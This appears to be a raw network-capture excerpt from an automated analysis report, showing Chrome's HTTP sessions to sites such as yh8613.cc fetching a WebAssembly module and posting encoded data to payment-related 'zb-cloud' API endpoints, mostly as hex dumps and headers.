                                                                                                                                                          2024-06-09 22:41:18 UTC1404INData Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 59 6d 6f db 36 10 fe 2d 13 f6 ad 96 94 0c 1d 3a b8 d8 87 cd c9 b6 64 6b 12 d4 71 53 ac e8 07 5a 62 24 da 34 a9 88 54 12 3b c8 7f df 89 d4 0b 25 8b b2 23 63 06 0c 8a bc 7b ee f8 1c 79 a4 48 39 c8 52 fa eb cb 1c 09 3c 4b e9 38 c5 62 c2 57 9f 39 97 ef 1c 7f 21 9c 51 42 b3 88 b0 1b 24 e3 b1 13 00 d4 57 85 96 82 16 05 4b 14 61 31 7e 11 44 e2 f1 0b e5 01 92 84 b3 dc 4f ed e4 75 14 cd 0d 9d 13 a1 15 9e f3 67 67 14 70 76 4f a2 f1 cb eb 2b 54 57 2b d0 6d a3 7c ad 01 27 32 c6 2b a0 27 84 89 f2 3c 5f cb 7d e7 1d 50 bb cd eb a5 b7 6d 28 fc b4 aa cb 28 c5 11 69 1b 35 c6 a3 b4 01 ba 09 0c 08 e0 16 0f 19 4e d7 63 47 3f 7d fd 70 7f f2 4e bd 53 67 34 07 2b 21 53 94 8c 9d aa ea 57 35 67 54 4b dd 90 20 ca 23 67 bc 25 f2 b7 30 a3 05 34 31 ae
                                                                                                                                                          Data Ascii: Ymo6-:dkqSZb$4T;%#c{yH9R<K8bW9!QB$WKa1~DOuggpvO+TW+m|'2+'<_}Pm((i5NcG?}pNSg4+!SW5gTK #g%041


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          499192.168.2.550283188.114.96.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC577OUTGET /mimlib.wasm HTTP/1.1
                                                                                                                                                          Host: stt-wasm.ai4funs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://yh8613.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC830INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:18 GMT
                                                                                                                                                          Content-Type: application/wasm
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                          ETag: W/"88346086e882b94f3127e009fea42084"
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-robots-tag: nosnippet
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rWjBg3dHDXetWrMpEBQyvSg08KVTn%2B1HeM94P4GKv9GYebZKQllf1Yz7dGpdLCvox6agijYkO4Hwk9hChIhnrN4FCF3BEC3xiAEfPTQ7GhSuUl6NFEADjarzGd4muGNxnXKyVUm7UQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8914a0d9bec33156-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          2024-06-09 22:41:18 UTC539INData Raw: 65 31 33 0d 0a 00 61 73 6d 01 00 00 00 01 bc 01 1b 60 04 7f 7f 7f 7f 01 7f 60 02 7f 7f 00 60 00 00 60 01 7f 00 60 03 7f 7f 7f 00 60 01 7f 01 7f 60 02 7f 7f 01 7f 60 07 7f 7e 7f 7f 7f 7f 7f 00 60 05 7f 7f 7f 7f 7f 00 60 04 7f 7f 7f 7f 00 60 03 7f 7f 7f 01 7f 60 08 7f 7f 7f 7f 7f 7f 7f 7f 00 60 06 7f 7f 7f 7f 7f 7f 00 60 03 7f 7e 7f 00 60 02 7f 7e 00 60 00 01 7f 60 03 7f 7f 7f 01 7e 60 01 7e 01 7f 60 00 01 7c 60 03 7f 7f 7f 01 7c 60 05 7f 7e 7f 7f 7f 00 60 06 7e 7f 7f 7f 7f 7f 00 60 06 7f 7e 7f 7f 7f 7f 00 60 06 7f 7f 7f 7f 7f 7f 01 7f 60 02 7f 7c 00 60 07 7f 7f 7f 7f 7f 7f 7f 00 60 05 7f 7f 7f 7f 7f 01 7f 02 bc 02 0b 03 65 6e 76 0d 72 75 6e 74 69 6d 65 2e 74 69 63 6b 73 00 12 16 77 61 73 69 5f 73 6e 61 70 73 68 6f 74 5f 70 72 65 76 69 65 77 31 08 66 64 5f
                                                                                                                                                          Data Ascii: e13asm````````~``````~`~``~`~`|`|`~`~`~``|``envruntime.tickswasi_snapshot_preview1fd_
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 05 05 01 05 01 01 04 0c 02 02 02 08 06 0a 0a 09 08 0a 04 13 10 10 04 06 04 01 0d 0a 0e 01 03 03 02 02 02 00 00 00 05 04 03 00 03 02 03 02 03 01 01 03 02 14 15 11 11 0e 16 01 05 03 0f 03 01 05 07 01 07 07 07 07 07 00 06 09 0f 17 00 02 04 0c 06 0a 03 0b 00 04 00 01 0e 05 09 0c 04 04 05 00 0a 0d 0d 04 18 19 0b 09 05 03 06 06 02 02 02 03 02 03 0f 01 1a 04 05 01 70 01 0b 0b 05 03 01 00 02 06 12 03 7f 01 41 80 80 04 0b 7f 01 41 00 0b 7f 01 41 00 0b 07 cb 01 0d 06 6d 65 6d 6f 72 79 02 00 06 6d 61 6c 6c 6f 63 00 7e 04 66 72 65 65 00 7f 06 63 61 6c 6c 6f 63 00 80 01 07 72 65 61 6c 6c 6f 63 00 81 01 06 5f 73 74 61 72 74 00 82 01 06 72 65 73 75 6d 65 00 83 01 0c 67 6f 5f 73 63 68 65 64 75 6c 65 72 00 84 01 15 61 73 79 6e 63 69 66 79 5f 73 74 61 72 74 5f 75 6e 77 69
                                                                                                                                                          Data Ascii: pAAAmemorymalloc~freecallocrealloc_startresumego_schedulerasyncify_start_unwi
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 21 04 23 02 28 02 00 20 04 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 22 04 20 00 36 02 00 20 04 20 01 36 02 04 20 04 20 02 36 02 08 20 04 20 03 36 02 0c 20 04 20 05 36 02 10 20 04 20 06 36 02 14 20 04 20 07 36 02 18 20 04 20 08 36 02 1c 23 02 23 02 28 02 00 41 20 6a 36 02 00 0b c6 03 01 05 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 24 6b 36 02 00 23 02 28 02 00 22 06 28 02 00 21 00 20 06 28 02 04 21 01 20 06 28 02 08 21 02 20 06 28 02 0c 21 03 20 06 28 02 10 21 04 20 06 28 02 14 21 07 20 06 28 02 18 21 08 20 06 28 02 1c 21 09 20 06 28 02 20 21 06 0b 02 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 04 6b 36 02 00 23 02 28 02 00 28 02 00 21 05 0b 23 01 45 04 40 23 00 41 20 6b 22 08 24 00 20 08 42 00 37 02 14 20 08 42 03 37 02 0c
                                                                                                                                                          Data Ascii: !#( 6##(Aj6#(" 6 6 6 6 6 6 6 6##(A j6#AF@##(A$k6#("(! (! (! (! (! (! (! (! ( !#AF@##(Ak6#((!#E@#A k"$ B7 B7
                                                                                                                                                          2024-06-09 22:41:18 UTC333INData Raw: 07 6b 22 01 41 01 10 54 20 05 20 07 6b 41 02 6a 21 02 03 40 20 02 41 8c ad 05 28 02 00 47 04 40 20 02 41 02 10 54 20 02 41 01 6a 21 02 0c 01 0b 0b 20 01 41 04 74 41 b0 b2 05 6a 22 01 41 00 20 00 fc 0b 00 20 01 0f 0b 0b 20 08 41 03 46 41 01 23 01 1b 04 40 41 cc 87 04 41 0d 10 45 41 03 23 01 41 01 46 0d 04 1a 0b 23 01 45 04 40 00 0b 0b 20 06 41 00 23 01 1b 21 06 0b 23 01 45 04 40 41 8c ad 05 28 02 00 21 03 20 02 21 01 0c 01 0b 0b 00 0b 21 04 23 02 28 02 00 20 04 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 22 04 20 00 36 02 00 20 04 20 02 36 02 04 20 04 20 01 36 02 08 20 04 20 03 36 02 0c 20 04 20 05 36 02 10 20 04 20 06 36 02 14 20 04 20 07 36 02 18 23 02 23 02 28 02 00 41 1c 6a 36 02 00 41 00 0b c4 02 01 04 7f 23 01 41 02 46 04 40 23 02
                                                                                                                                                          Data Ascii: k"AT kAj!@ A(G@ AT Aj! AtAj"A AFA#@AAEA#AF#E@ A#!#E@A(! !!#( 6##(Aj6#(" 6 6 6 6 6 6 6##(Aj6A#AF@#
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 37 66 66 61 0d 0a 04 6b 36 02 00 23 02 28 02 00 28 02 00 21 03 0b 23 01 45 04 40 23 00 41 20 6b 22 05 24 00 20 05 42 00 37 02 14 20 05 42 03 37 02 0c 41 b4 ad 05 28 02 00 21 04 41 b4 ad 05 20 05 41 08 6a 22 06 36 02 00 20 05 20 04 36 02 08 0b 20 03 41 00 23 01 1b 45 04 40 20 02 10 0e 41 00 23 01 41 01 46 0d 01 1a 21 06 0b 23 01 45 04 40 20 06 20 01 20 02 fc 0a 00 00 41 b4 ad 05 20 04 36 02 00 20 00 20 02 36 02 04 20 00 20 06 36 02 00 20 05 41 20 6a 24 00 0b 0f 0b 21 03 23 02 28 02 00 20 03 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 22 03 20 00 36 02 00 20 03 20 01 36 02 04 20 03 20 02 36 02 08 20 03 20 05 36 02 0c 20 03 20 06 36 02 10 20 03 20 04 36 02 14 23 02 23 02 28 02 00 41 18 6a 36 02 00 0b 0b 00 41 12 41 a4 88 04 10 89 01 0b 91
                                                                                                                                                          Data Ascii: 7ffak6#((!#E@#A k"$ B7 B7A(!A Aj"6 6 A#E@ A#AF!#E@ A 6 6 6 A j$!#( 6##(Aj6#(" 6 6 6 6 6 6##(Aj6AA
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 00 0b 0b 20 01 41 00 23 01 1b 45 04 40 20 00 10 14 41 00 23 01 41 01 46 0d 01 1a 21 00 0b 23 01 45 04 40 20 00 2f 01 10 0f 0b 00 0b 21 01 23 02 28 02 00 20 01 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 20 00 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 41 00 0b a0 03 01 03 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 08 6b 36 02 00 23 02 28 02 00 22 01 28 02 00 21 00 20 01 28 02 04 21 01 0b 02 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 04 6b 36 02 00 23 02 28 02 00 28 02 00 21 03 0b 20 01 20 00 45 23 01 1b 21 01 02 40 23 01 45 04 40 20 01 0d 01 20 00 41 03 71 21 01 0b 02 40 02 40 23 01 45 04 40 02 40 02 40 02 40 02 40 20 01 0d 00 41 01 21 01 02 40 02 40 20 00 2d 00 00 41 1f 71 41 01 6b 0e 1a 08 02 08 00 02 04 02 08 00 02 04
                                                                                                                                                          Data Ascii: A#E@ A#AF!#E@ /!#( 6##(Aj6#( 6##(Aj6A#AF@##(Ak6#("(! (!#AF@##(Ak6#((! E#!@#E@ Aq!@@#E@@@@@ A!@@ -AqAk
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 04 40 02 40 20 01 0e 03 00 0a 02 03 0b 20 02 41 28 6a 21 01 0b 20 06 41 03 46 41 01 23 01 1b 04 40 20 01 41 e7 85 04 41 07 20 04 20 09 10 0d 41 03 23 01 41 01 46 0d 0d 1a 0b 23 01 45 04 40 20 02 20 02 28 02 28 22 04 36 02 c4 05 20 02 28 02 2c 21 09 0c 0c 0b 0b 23 01 45 04 40 20 09 45 22 01 0d 09 20 04 2d 00 00 41 3c 47 21 01 0b 02 40 23 01 45 04 40 20 01 0d 01 20 02 41 38 6a 21 01 0b 20 06 41 04 46 41 01 23 01 1b 04 40 20 01 41 ee 85 04 41 06 20 04 20 09 10 0d 41 04 23 01 41 01 46 0d 0d 1a 0b 23 01 45 04 40 20 02 20 02 28 02 38 22 04 36 02 c8 05 20 02 28 02 3c 21 03 20 02 41 30 6a 21 01 0b 20 06 41 05 46 41 01 23 01 1b 04 40 20 01 20 04 20 03 41 f4 85 04 41 01 10 0d 41 05 23 01 41 01 46 0d 0d 1a 0b 23 01 45 04 40 20 02 20 02 28 02 30 22 04 36 02 cc 05 20
                                                                                                                                                          Data Ascii: @@ A(j! AFA#@ AA A#AF#E@ (("6 (,!#E@ E" -A<G!@#E@ A8j! AFA#@ AA A#AF#E@ (8"6 (<! A0j! AFA#@ AAA#AF#E@ (0"6
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 01 21 05 0b 20 06 41 17 46 41 01 23 01 1b 04 40 20 03 41 fe 85 04 41 04 20 04 20 05 10 0d 41 17 23 01 41 01 46 0d 07 1a 0b 23 01 45 04 40 20 02 20 02 28 02 b0 01 22 04 36 02 a0 06 20 02 41 a8 01 6a 21 03 20 02 28 02 b4 01 21 05 0b 20 06 41 18 46 41 01 23 01 1b 04 40 20 03 20 04 20 05 41 82 86 04 41 01 10 0d 41 18 23 01 41 01 46 0d 07 1a 0b 23 01 45 04 40 20 02 20 02 28 02 a8 01 22 04 36 02 a4 06 20 02 28 02 ac 01 21 09 0b 20 06 41 19 46 41 01 23 01 1b 04 40 20 01 10 17 41 19 23 01 41 01 46 0d 07 1a 21 0b 0b 23 01 45 04 40 20 02 20 0b 36 02 a8 06 20 02 41 a0 01 6a 21 01 0b 20 06 41 1a 46 41 01 23 01 1b 04 40 20 01 20 0b 10 18 41 1a 23 01 41 01 46 0d 07 1a 0b 23 01 45 04 40 20 02 20 02 28 02 a0 01 22 0b 36 02 ac 06 20 02 28 02 a4 01 21 03 20 02 41 98 01 6a
                                                                                                                                                          Data Ascii: ! AFA#@ AA A#AF#E@ ("6 Aj! (! AFA#@ AAA#AF#E@ ("6 (! AFA#@ A#AF!#E@ 6 Aj! AFA#@ A#AF#E@ ("6 (! Aj
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 20 02 28 02 f4 01 21 07 20 02 20 0c 41 96 83 04 6a 2d 00 00 3a 00 9e 05 20 02 41 9e 05 6a 21 08 20 02 41 e0 01 6a 21 05 0b 20 06 41 27 46 41 01 23 01 1b 04 40 20 05 20 04 20 08 20 07 20 03 41 01 10 1d 41 27 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 20 02 28 02 e0 01 22 04 36 02 80 07 20 09 2d 00 00 41 0f 71 22 0c 41 0f 46 0d 0b 20 02 28 02 e8 01 21 03 20 02 28 02 e4 01 21 07 20 02 20 0c 41 96 83 04 6a 2d 00 00 3a 00 9f 05 41 01 21 0c 20 02 41 9f 05 6a 21 08 20 02 41 d0 01 6a 21 05 0b 20 06 41 28 46 41 01 23 01 1b 04 40 20 05 20 04 20 08 20 07 20 03 41 01 10 1d 41 28 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 28 02 d8 01 21 07 20 02 28 02 d4 01 21 08 20 02 28 02 d0 01 21 04 0c 03 0b 0b 23 01 45 04 40 20 02 41 22 3a 00 a0 05 20 02 41 b0 04 6a 21
                                                                                                                                                          Data Ascii: (! Aj-: Aj! Aj! A'FA#@ AA'#AF#E@ ("6 -Aq"AF (! (! Aj-:A! Aj! Aj! A(FA#@ AA(#AF#E@ (! (! (!#E@ A": Aj!
                                                                                                                                                          2024-06-09 22:41:18 UTC1369INData Raw: 01 23 01 1b 04 40 20 03 20 04 41 a6 8d 04 20 08 20 07 41 02 10 1d 41 34 23 01 41 01 46 0d 10 1a 0b 23 01 45 04 40 20 02 20 02 28 02 c0 03 22 04 36 02 a0 07 20 02 28 02 c8 03 21 07 20 02 28 02 c4 03 21 08 0c 04 0b 0b 20 03 20 02 41 d0 03 6a 23 01 1b 21 03 20 06 41 35 46 41 01 23 01 1b 04 40 20 03 20 04 41 a8 8d 04 20 08 20 07 41 02 10 1d 41 35 23 01 41 01 46 0d 0f 1a 0b 23 01 45 04 40 20 02 20 02 28 02 d0 03 22 04 36 02 a4 07 20 02 28 02 d8 03 21 07 20 02 28 02 d4 03 21 08 0c 03 0b 0b 20 03 20 02 41 e0 03 6a 23 01 1b 21 03 20 06 41 36 46 41 01 23 01 1b 04 40 20 03 20 04 41 aa 8d 04 20 08 20 07 41 02 10 1d 41 36 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 20 02 28 02 e0 03 22 04 36 02 a8 07 20 02 28 02 e8 03 21 07 20 02 28 02 e4 03 21 08 0c 02 0b 0b 20
                                                                                                                                                          Data Ascii: #@ A AA4#AF#E@ ("6 (! (! Aj#! A5FA#@ A AA5#AF#E@ ("6 (! (! Aj#! A6FA#@ A AA6#AF#E@ ("6 (! (!


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          500192.168.2.550266103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC678OUTPOST /zb-cloud/pwv/sn.notice.new.layer.query HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 560
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://xpj723.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC560OUTData Raw: 6a 73 6f 6e 3d 70 77 76 7c 31 33 7c 51 55 68 4c 4d 44 4b 6a 6d 47 47 62 42 73 4b 73 59 30 48 62 4f 6c 4f 77 45 76 68 33 52 6e 66 33 51 44 59 35 4b 52 4b 33 4e 49 56 6c 59 76 42 7a 55 68 58 69 4f 78 62 6a 72 32 35 6f 72 50 4f 73 59 6d 59 6e 4f 30 4b 6b 44 66 46 64 50 69 44 76 4d 68 47 6a 4e 61 4e 79 59 77 51 75 44 47 55 79 64 32 42 78 57 7a 59 61 56 30 47 73 59 6d 5a 62 64 6f 35 74 73 33 4e 6d 44 32 59 74 65 77 56 33 4a 6b 76 69 75 58 49 6b 59 75 47 31 44 47 4d 35 54 56 54 6b 54 4a 5a 53 53 56 50 6b 66 57 48 61 45 56 31 71 46 51 4e 63 49 57 58 42 48 52 62 44 5a 55 56 6b 70 32 34 73 4e 6e 52 6f 57 30 47 77 59 74 5a 69 71 4d 47 66 56 57 59 61 4c 5a 49 55 46 51 4e 63 62 4a 50 6e 58 53 6a 76 50 48 49 34 56 47 50 7a 4e 43 51 4c 4f 44 47 69 47 6f 4a 68 4f 75 4e
                                                                                                                                                          Data Ascii: json=pwv|13|QUhLMDKjmGGbBsKsY0HbOlOwEvh3Rnf3QDY5KRK3NIVlYvBzUhXiOxbjr25orPOsYmYnO0KkDfFdPiDvMhGjNaNyYwQuDGUyd2BxWzYaV0GsYmZbdo5ts3NmD2YtewV3JkviuXIkYuG1DGM5TVTkTJZSSVPkfWHaEV1qFQNcIWXBHRbDZUVkp24sNnRoW0GwYtZiqMGfVWYaLZIUFQNcbJPnXSjvPHI4VGPzNCQLODGiGoJhOuN
                                                                                                                                                          2024-06-09 22:41:18 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:18 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:18 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 38 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:18 GMT
                                                                                                                                                          2024-06-09 22:41:18 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:18 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:18 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:18 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:18 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:18 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:18 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          501192.168.2.550280170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC664OUTPOST /zb-cloud/pwv/sn.settings.get HTTP/1.1
                                                                                                                                                          Host: ahd-ocssn.qqxgo.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 484
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://yh8613.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC484OUTData Raw: 6a 73 6f 6e 3d 70 77 76 7c 31 33 7c 46 44 63 56 46 4e 41 75 72 4e 57 6c 48 77 42 63 4c 30 54 6b 46 64 49 73 51 76 68 33 52 6e 66 33 51 74 49 31 4d 52 4b 34 4e 6f 56 6c 59 76 51 69 50 72 51 73 45 69 67 71 68 32 35 79 78 54 46 63 4c 79 48 65 47 30 45 67 50 66 46 64 50 69 44 76 4d 68 47 6a 4e 61 4e 79 59 77 46 64 59 51 4e 69 74 32 4d 63 44 70 49 67 5a 30 58 63 4c 79 49 73 76 69 35 75 43 54 4f 30 66 41 35 6d 66 69 35 6e 58 56 4f 6d 43 6b 56 78 5a 67 57 6b 46 66 44 6f 55 4f 41 6e 62 53 5a 65 44 69 58 6b 46 30 59 6c 49 30 4c 68 4a 6f 4e 79 65 73 55 77 4b 67 56 70 52 46 47 6c 49 78 55 35 46 5a 65 64 49 61 5a 72 4d 66 5a 65 44 69 59 30 64 51 56 6c 45 57 45 76 4f 58 4d 45 54 54 47 77 54 57 44 47 48 75 48 75 57 68 4e 75 4b 71 51 70 44 74 52 67 70 66 31 67 61 62 45
                                                                                                                                                          Data Ascii: json=pwv|13|FDcVFNAurNWlHwBcL0TkFdIsQvh3Rnf3QtI1MRK4NoVlYvQiPrQsEigqh25yxTFcLyHeG0EgPfFdPiDvMhGjNaNyYwFdYQNit2McDpIgZ0XcLyIsvi5uCTO0fA5mfi5nXVOmCkVxZgWkFfDoUOAnbSZeDiXkF0YlI0LhJoNyesUwKgVpRFGlIxU5FZedIaZrMfZeDiY0dQVlEWEvOXMETTGwTWDGHuHuWhNuKqQpDtRgpf1gabE
                                                                                                                                                          2024-06-09 22:41:19 UTC507INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: aliyungf_tc=e0e21ee13fdfe9d830baee8af58ff38d1992d7895fba5e9ac4bac2417c296bf4; Path=/; HttpOnly
                                                                                                                                                          Server: Tengine/2.3.0
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          api-elapsed: 3
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:19 UTC2418INData Raw: 39 36 62 0d 0a 7b 22 69 64 22 3a 22 31 37 39 37 32 38 37 36 32 35 39 33 38 33 22 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 6d 73 4c 6f 67 69 6e 46 6c 61 67 22 3a 30 2c 22 74 68 69 72 64 70 61 72 74 79 54 72 61 6e 73 66 65 72 4f 75 74 4c 6f 77 65 72 54 68 72 65 73 68 6f 6c 64 22 3a 30 2c 22 70 61 79 43 68 61 72 67 65 46 6c 61 67 22 3a 31 2c 22 71 71 50 61 79 54 61 67 22 3a 32 2c 22 61 67 65 6e 74 52 65 62 61 74 65 46 6c 61 67 22 3a 31 2c 22 69 6e 74 65 72 6e 43 68 61 72 67 65 46 6c 61 67 22 3a 31 2c 22 64 65 66 61 75 6c 74 41 67 65 6e 74 43 6f 64 65 46 6c 61 67 22 3a 30 2c 22 71 71 50 61 79 54 61 67 46 6c 61 67 22 3a 30 2c 22 6a 64 50 61 79 49 6e 64 65 78 22 3a 30 2c 22 61 75 64 69 74 57 69 74 68 64 72 61 77 46 6c 61 67 22 3a 31 2c 22 73 75 62 54 72 61 6e 66
                                                                                                                                                          Data Ascii: 96b{"id":"17972876259383","result":{"smsLoginFlag":0,"thirdpartyTransferOutLowerThreshold":0,"payChargeFlag":1,"qqPayTag":2,"agentRebateFlag":1,"internChargeFlag":1,"defaultAgentCodeFlag":0,"qqPayTagFlag":0,"jdPayIndex":0,"auditWithdrawFlag":1,"subTranf
